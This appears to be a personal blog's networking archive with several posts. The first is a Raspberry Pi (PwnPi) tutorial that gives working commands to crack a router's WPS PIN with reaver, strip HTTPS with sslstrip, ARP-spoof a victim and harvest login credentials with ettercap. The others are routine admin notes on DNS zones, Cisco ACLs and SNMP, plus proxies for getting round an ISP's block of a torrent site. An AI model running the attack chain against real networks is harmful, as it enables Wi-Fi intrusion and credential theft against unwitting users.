Archive for the ‘Networking’ Category
Finally I found a nice project for my Raspberry PI 
I’ll write down some notes in this post to make it easier to find back some linux commands. Please use this documentation only as a white hat hacker and for learning purposes only!!!!
First:
- Have a compatible USB wireless dongle (list @ pwnpi.net )
- Download PwnPI @ pwnpi.net
- Download win32diskimager @ http://sourceforge.net/projects/win32diskimager/
- Write the image to a SD card
- Boot up your PI (with a network cable)
- Scan the network (I use netscan.exe)
- Connect with putty to your device
To break in a WPS compatible wireless access point:
- airmon-ng start wlan0
- reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
- After +/- 10 hours you have the PSK
Now configure the wireless with your credentials
- airmon-ng stop wlan0
- nano /etc/network/interfaces
- Original file:
auto lo iface lo inet loopback iface eth0 inet dhcp allow-hotplug wlan0 iface wlan0 inet manual wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp
- New file:
auto lo iface lo inet loopback iface eth0 inet dhcp iface wlan0 inet dhcp wpa-ssid "L0g0ff" wpa-psk "SomePassword" allow-hotplug wlan0 iface wlan0 inet dhcp #wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp
- Now bring up the wireless card: ifup wlan0
Now the wireless setup is done we make our PI an IP forwarding server. So that we can do man in the middle attacks.
- nano /proc/sys/net/ipv4/ip_forward change the 0 to 1
-
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
(needed to forward all HTTP traffic to SSLStrip)
- sslstrip -l 666 (do not close this terminal)
Now the proxy is running we want to ARP spoof so that we can redirect all traffic to our PI
- arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (where 1.12 is our victim and 1.1 our gateway) (do not close ths terminal)
- You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if your PI cannot handle all traffic you will DoS your network.
And now all things are set the sniffing can begin
- ettercap -m ettercap.log -Tq -i wlan0 (don’t close the terminal)
The only thing left now is wait that the victim is going to log in a website and the username and password will write in to the ettercap.log file. With the command cat ettercap.log |grep USER you can see all the login credentials.
What do we learned?
- Never login to a website without https
- Never login to a website with https errors
- Always disable WPS on your router
- On company wireless sites always use a DMZ
Sources:
http://www.ikwashetniet.blogspot.nl/2012/01/wps-van-handig-hulpmiddel-naar-gapend.html
http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html
The difference between stub zone and secondary DNS zones… It all relates to replication, efficiency and availability.
Think of it like this:
There are two cities, London and Manchester.
London has 100 people, each with a book full of information (so 100 books in total).
You are in Manchester and you want to be able to have access to the information in these “books”.
There are two ways to do this as follows:
a) Another 100 people appear in London, they each make a copy of a book, and they each take their own car in order to drive to Manchester to meet you and give you the books. This causes a traffic jam due to the high number of people driving on the highway.
The above is secondary zone replication.
b) Instead of the above, you received the address of the 100 people in London. You need information in one of the books. You decide to take your car, and you drive to the address. You found the information you need, and you drive back to Manchester.
This example is a stub zone.
So think about it for a second.
In example A, the information is stored twice, both in London and Manchester, but the information requires a big highway to transport those 100 people, each in their individual cars, to your office in Manchester. Do you have a big enough highway to support this many people?
In example B, you don’t need such a big highway because a massive number of people are not clogging the highway, each trying to bring a book to you, but instead you decide to go back to London to find the book you need.
So what do we gather from this?
In example A, you need a large highway (lots of bandwidth) to get the books from London to Manchester. But once the information is in Manchester, you can very quickly find the book you need.
In example B, you don’t need a large highway to find the book in London, but you do need a RELIABLE highway. If this highway is closed, how do you get the book? And remember, since the books are not in Manchester, it will take longer for you to get the book (since you need to drive back and forth for it).
Hope this helps, first thing that came to my mind.
Thanks to Shinigami
Maybe it’s a illusion but if every one use a mail SPF DNS record and everyone will bounce or filter domains without a SPF the internet is spam free
Microsoft has a nice wizard to create a SPF for your own domain: http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/
A link to a very nice bandwidth calculator: http://web.forret.com/tools/bandwidth.asp?speed=4&unit=TB%2Fm
- First check accesslist with show run
- Then check the dialer
!
interface Dialer1
description Internet
ip address negotiated
ip access-group 111 in
ip nat outside
ip inspect list1 out
ip virtual-reassembly
- Copy the access group line (bold) to notepad
- Now do a show run and copy the specific (111 in my case) accesslist to notepad
access-list 111 permit tcp any any established
access-list 111 permit icmp any any administratively-prohibited
access-list 111 permit icmp any any echo
access-list 111 permit icmp any any echo-reply
access-list 111 permit icmp any any packet-too-big
access-list 111 permit icmp any any time-exceeded
access-list 111 permit icmp any any traceroute
access-list 111 permit icmp any any unreachable
access-list 111 permit tcp any any eq ftp
access-list 111 permit tcp any any eq www
access-list 111 deny ip any any log
- Now change the ACL with the new line (bold) still in notepad
access-list 111 permit tcp any any established
access-list 111 permit icmp any any administratively-prohibited
access-list 111 permit icmp any any echo
access-list 111 permit icmp any any echo-reply
access-list 111 permit icmp any any packet-too-big
access-list 111 permit icmp any any time-exceeded
access-list 111 permit icmp any any traceroute
access-list 111 permit icmp any any unreachable
access-list 111 permit tcp any any eq ftp
access-list 111 permit tcp any any eq www
access-list 111 permit tcp any any eq 443
access-list 111 deny ip any any log
- now type conf t
- and type interface dialer1
- now temporary disable the accesslist with: no ip access-group 111 in
- type exit to exit the Dialer1 interface
- type no access-list 111 to clear the current ACL
- Past the new modified ACL fro notepad to your router
- Type interface dialer1
- Type ip access-group 111 in to enable new new access lists
- Type exit
- Test the new rule
- Type wr mem to write the config from RAM to ROM
If you want to know what a specific SNMP value must be, snmpwalk is your friend
snmpwalk -v1 -c <snmp community name> -On <ip server> 1.3
XS4ALL and Ziggo block my favorite torrent site 
Try This (dutch): http://www.ikwilthepiratebay.nl
-or-
-or-
This http://www.alwaysapirate.org/index.php and type http://thepiratebay.se/
-or-
This: http://thepiratebay.se.proxy.piratenpartij.nl/ < temp down…
-or-
Here you can find some a alterative proxies:
http://hidemyass.com/?http://www.thepiratebay.org
And click on the yellow url
And then on the yellow hide my ass button:
http://depiratebay.nl/
http://tpb.makinit.nl/
http://thepiratebay2.nl/
http://www.anti-brein.nl/piratebay/
http://tpb.dehomies.nl/
http://anonymouse.org/cgi-bin/anon-www.cgi/http://thepiratebay.se/
And do you want to run a mirror on your own wordpress blog check repress: http://wordpress.org/extend/plugins/repress/
Be careful so do a backup of the snmpd config file.
[root@linux ~]# mv /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.org
Create a new config file.
[root@linux ~]# nano /etc/snmp/snmpd.conf
rocommunity public IPMonitorServer syslocation "Webserver, WAPNET" syscontact some@email.com
Start the snmpd service and set the snmp stratup at boot on
[root@linux ~]# /etc/init.d/snmpd start
[root@linux ~]# chkconfig snmpd on
Sometimes you need a proxy server and you don’t want to install some software. Then you can download and run Proxomitron (zip package). The only thing you must change is the IP address who can connect the proxy.
If you use a lot of remote desktop connections visionapp is a very nice freeware tool to manage them. You can also manage SSH, Telnet, VNC and ICA clients with this software.
